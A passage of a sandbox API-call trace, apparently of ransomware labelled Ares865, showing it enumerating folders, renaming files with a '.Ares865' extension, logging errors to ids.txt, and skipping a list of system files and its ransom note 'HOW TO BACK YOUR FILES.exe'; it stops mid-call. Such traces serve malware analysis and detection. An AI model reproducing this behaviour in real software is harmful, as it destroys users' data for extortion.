lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4ef1 [0090.906] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xe4, lpOverlapped=0x0) returned 1 [0090.906] CloseHandle (hObject=0x118) returned 1 [0090.906] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.906] CloseHandle (hObject=0x0) returned 0 [0090.906] CloseHandle (hObject=0x0) returned 0 [0090.906] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x666ec5c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x666ec5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x666ec5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPLog-09132019-235903.log", cAlternateFileName="MPLOG-~1.LOG")) returned 0 [0090.906] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.906] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2368 [0090.911] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 185 [0090.911] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0090.912] GetLastError () returned 0x20 [0090.912] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 207 [0090.912] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 207 [0090.912] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.912] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4fd5 [0090.912] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xcf, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xcf, lpOverlapped=0x0) returned 1 [0090.912] CloseHandle (hObject=0x118) returned 1 [0090.917] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.917] CloseHandle (hObject=0x0) returned 0 [0090.917] CloseHandle (hObject=0x0) returned 0 [0090.917] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0090.917] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.917] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b30 [0090.944] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865") returned 223 [0090.944] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows defender\\support\\mplog-09132019-235903.log"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows defender\\support\\mplog-09132019-235903.log.ares865"), dwFlags=0x1) returned 0 [0090.944] GetLastError () returned 0x20 [0090.944] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log MoveFileEx error 32\r\n") returned 245 [0090.944] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Support\\MPLog-09132019-235903.log MoveFileEx error 32\r\n") returned 245 [0090.944] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.945] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x50a4 [0090.945] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xf5, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xf5, lpOverlapped=0x0) returned 1 [0090.945] CloseHandle (hObject=0x118) returned 1 [0090.945] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.945] CloseHandle (hObject=0x0) returned 0 [0090.945] CloseHandle (hObject=0x0) returned 0 [0090.945] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x666ec5c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x666ec5c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x666ec5c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MPLog-09132019-235903.log", cAlternateFileName="MPLOG-~1.LOG")) returned 0 [0090.945] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.945] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2388 [0090.950] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 202 [0090.950] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0090.950] GetLastError () returned 0x20 [0090.950] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 224 [0090.950] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 224 [0090.950] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.951] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5199 [0090.951] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xe0, lpOverlapped=0x0) returned 1 [0090.951] CloseHandle (hObject=0x118) returned 1 [0090.951] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.951] CloseHandle (hObject=0x0) returned 0 [0090.951] CloseHandle (hObject=0x0) returned 0 [0090.951] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0090.951] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.951] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bf0 [0090.981] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865") returned 219 [0090.981] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racmetadata.dat.ares865"), dwFlags=0x1) returned 0 [0090.981] GetLastError () returned 0x20 [0090.981] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 241 [0090.981] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacMetaData.dat MoveFileEx error 32\r\n") returned 241 [0090.981] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0090.981] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5279 [0090.981] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0xf1, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0xf1, lpOverlapped=0x0) returned 1 [0090.982] CloseHandle (hObject=0x118) returned 1 [0090.982] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0090.982] CloseHandle (hObject=0x0) returned 0 [0090.982] CloseHandle (hObject=0x0) returned 0 [0090.982] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0090.982] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.982] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2248 [0091.000] wsprintfA (in: param_1=0x2ccebc8, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\* FindFirstFile error 3\r\n") returned 292 [0091.000] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\* FindFirstFile error 3\r\n") returned 292 [0091.000] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.000] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x536a [0091.000] WriteFile (in: hFile=0x120, lpBuffer=0x2ccebc8*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2cce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ccebc8*, lpNumberOfBytesWritten=0x2cce0b4*=0x124, lpOverlapped=0x0) returned 1 [0091.001] CloseHandle (hObject=0x120) returned 1 [0091.001] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0091.001] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.001] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.001] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.001] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2efc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.001] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.001] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.001] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.001] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.001] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c2efc20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.001] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.001] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c2efc20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0091.001] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.001] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79f0 [0091.002] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.002] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.002] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.002] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2efc20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.002] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.002] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.002] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.002] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.002] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c2efc20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.002] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.002] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6328e1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6328e1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 1 [0091.002] lstrcmpiW (lpString1="logs", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.002] lstrcmpiW (lpString1="logs", lpString2="aoldtz.exe") returned 1 [0091.002] lstrcmpiW (lpString1="logs", lpString2=".") returned 1 [0091.002] lstrcmpiW (lpString1="logs", lpString2="..") returned 1 [0091.002] lstrcmpiW (lpString1="logs", lpString2="windows") returned -1 [0091.002] lstrcmpiW (lpString1="logs", lpString2="bootmgr") returned 1 [0091.002] lstrcmpiW (lpString1="logs", lpString2="temp") returned -1 [0091.002] lstrcmpiW (lpString1="logs", lpString2="pagefile.sys") returned -1 [0091.002] lstrcmpiW (lpString1="logs", lpString2="boot") returned 1 [0091.002] lstrcmpiW (lpString1="logs", lpString2="ids.txt") returned 1 [0091.002] lstrcmpiW (lpString1="logs", lpString2="ntuser.dat") returned -1 [0091.003] lstrcmpiW (lpString1="logs", lpString2="perflogs") returned -1 [0091.003] lstrcmpiW (lpString1="logs", lpString2="MSBuild") returned -1 [0091.003] lstrlenW (lpString="logs") returned 4 [0091.003] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Mozilla\\*") returned 198 [0091.003] lstrcpyW (in: lpString1=0x2cce58a, lpString2="logs" | out: lpString1="logs") returned="logs" [0091.003] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0091.003] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x194) returned 0x2ca068 [0091.003] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0091.003] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6328e1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6328e1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 0 [0091.003] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.003] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79f0 [0091.003] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.003] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.003] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.003] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x6328e1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6328e1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.003] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.004] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.004] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.004] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.004] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c2efc20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2efc20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.004] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.004] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x632b4320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="maintenanceservice-install.log.Ares865", cAlternateFileName="MAINTE~1.ARE")) returned 1 [0091.004] lstrcmpiW (lpString1="maintenanceservice-install.log.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.004] lstrcmpiW (lpString1="maintenanceservice-install.log.Ares865", lpString2="aoldtz.exe") returned 1 [0091.004] lstrcmpiW (lpString1="maintenanceservice-install.log.Ares865", lpString2=".") returned 1 [0091.004] lstrcmpiW (lpString1="maintenanceservice-install.log.Ares865", lpString2="..") returned 1 [0091.004] lstrcmpiW (lpString1="maintenanceservice-install.log.Ares865", lpString2="windows") returned -1 [0091.004] lstrcmpiW 